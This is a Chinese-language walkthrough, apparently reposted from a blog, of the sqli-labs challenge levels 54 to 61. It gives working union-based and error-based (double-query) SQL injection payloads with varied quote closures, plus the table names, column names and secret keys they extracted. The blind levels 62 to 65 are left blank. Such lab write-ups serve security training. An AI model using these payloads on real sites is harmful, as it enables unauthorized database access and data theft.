- less 54GET-challenge-Union-10 queries allowed-Variation 1
- less 55GET-challenge-Union-14 queries allowed-Variation 2
- less 56
- less 57GET-challenge-Union-14 queries allowed-Variation 4
- less 58GET-challenge-Double Query-5 queries allowed-Variation 1
- less 59
- less 60GET-challenge-Double Query-5 queries allowed-Variation 3
- less 61GET-challenge-Double Query-5 queries allowed-Variation 4
- 后面的做不动啊…不会写脚本
- less 62GET-challenge-Blind- 130 queries allowed -variation 1
- less 63GET-challenge-Blind- 130 queries allowed -variation 2
- less 64GET-challenge-Blind- 130 queries allowed -variation 3
- less 65GET-challenge-Blind- 130 queries allowed -variation 4
环境坏掉了… 转载博客源地址: 文章源地址这里
less 54(GET-challenge-Union-10 queries allowed-Variation 1)
- 原理 只允许10次注入,这一关是普通的单引号注入
-
步骤
测试显示位
?id=1%27 order by 3 %23 // True?id=1%27 order by 4 %23 // false获取库名
?id=0%27 union select 1,2,database() %23 // True challenges获取表名
?id=0%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23 // True 8T3YRE3TXR获取列名
?id=0%27 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=%278T3YRE3TXR%27 %23// true secret_4XCQ获取key
?id=0%27 union select 1,2,group_concat(secret_4XCQ) from 8T3YRE3TXR %23 // True aefBbyoeStF7Edc3FZa4G5C4***less 55(GET-challenge-Union-14 queries allowed-Variation 2)
-
原理 14次注入,利用union
-
步骤
) 闭合 获取表
=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23 // True UBU4QNRHHP获取列
id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='UBU4QNRHHP' %23 //true// secret_6H3B获取key
0) union select 1,2,group_concat(secret_6H3B) from UBU4QNRHHP %23mLjAsOZnSEbQqIMybw1AnUYH
less 56()
-
原理
-
步骤
id=1') union select 1,2,3 %23获取表
0%27) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23KOUNR4QC6G获取列
0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='KOUNR4QC6G'%23secret_3EVD获取key
0') union select 1,2,group_concat(secret_3EVD) from KOUNR4QC6G %23KcU87wBerjRPTHsvWBL6Zpx1
less 57(GET-challenge-Union-14 queries allowed-Variation 4)
-
原理 改变闭合
-
步骤
获取表
0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23VAFBXAV18O获取列
0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='VAFBXAV18O'%23secret_G8PM获取key
0" union select 1,2,group_concat(secret_G8PM) from VAFBXAV18O %23dRwHUUQ2TXSGUZ556g7FikFJ***less 58(GET-challenge-Double Query-5 queries allowed-Variation 1)
-
原理 双查询来报错查询
-
步骤
获取表
1'and (select count(*) from information_schema.tables group by concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~',floor(rand(0)*2))) %235H512U9U27获取列
1'and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='5H512U9U27' limit 2,1),'~',floor(rand(0)*2))) %23secret_DD13获取key
1'and (select count(*) from information_schema.tables group by concat('~',(select secret_BJYY from 9JMRBSMHB3 limit 0,1),'~',floor(rand(0)*2))) %23fJw5d5MfwbirBtiV6ajyMVYL
less 59()
-
原理 id变为数字型 没有闭合方式
-
步骤
获取表
1 and (select count(*) from information_schema.tables group by concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~',floor(rand(0)*2))) %23N6JFY84247获取列
1 and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='N6JFY84247' limit 2,1),'~',floor(rand(0)*2))) %23secret_FWQ3获取key
1 and (select count(*) from information_schema.tables group by concat('~',(select secret_FWQ3 from N6JFY84247 limit 0,1),'~',floor(rand(0)*2))) %23VlWMK389WVuIephCe46vDls5
less 60(GET-challenge-Double Query-5 queries allowed-Variation 3)
-
原理
id=(“1”),改变闭合方式
-
步骤
获取表
http://192.168.64.135/Less-60/?id=1%22) and (select count(*) from information_schema.tables group by concat(%27~%27,(select table_name from information_schema.tables where table_schema=database() limit 0,1),%27~%27,floor(rand(0)*2))) %235H36JXB2F0
获取 列
http://192.168.64.135/Less-60/?id=1%22) and (select count(*) from information_schema.tables group by concat(%27~%27,(select column_name from information_schema.columns where table_schema=database() and table_name=%275H36JXB2F0%27 limit 2,1),%27~%27,floor(rand(0)*2))) %23secret_NFL6
获取key
http://192.168.64.135/Less-60/?id=1%22) and (select count(*) from information_schema.tables group by concat(%27~%27,(select secret_NFL6 from 5H36JXB2F0 limit 0,1),%27~%27,floor(rand(0)*2))) %2349DYkkaArpuMaYb5ITI6NYlP
less 61(GET-challenge-Double Query-5 queries allowed-Variation 4)
-
原理
id=((‘1’)),闭合方式
-
步骤
获取表 1%
27)) and (select count(*) from information_schema.tables group by concat(%27~%27,(select table_name from information_schema.tables where table_schema=database() limit 0,1),%27~%27,floor(rand(0)*2))) %23EKP9EVPEDH获取列
1')) and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='EKP9EVPEDH' limit 2,1),'~',floor(rand(0)*2))) %23secret_DI64获取key
1')) and (select count(*) from information_schema.tables group by concat('~',(select secret_DI64 from EKP9EVPEDH ),'~',floor(rand(0)*2))) %238r5XPen1KywllEINiQfAQnlq
后面的做不动啊…不会写脚本
less 62(GET-challenge-Blind- 130 queries allowed -variation 1)
-
原理 一看130次就知道要盲注测试
-
步骤
less 63(GET-challenge-Blind- 130 queries allowed -variation 2)
-
原理
-
步骤
less 64(GET-challenge-Blind- 130 queries allowed -variation 3)
-
原理
-
步骤
less 65(GET-challenge-Blind- 130 queries allowed -variation 4)
-
原理
-
步骤
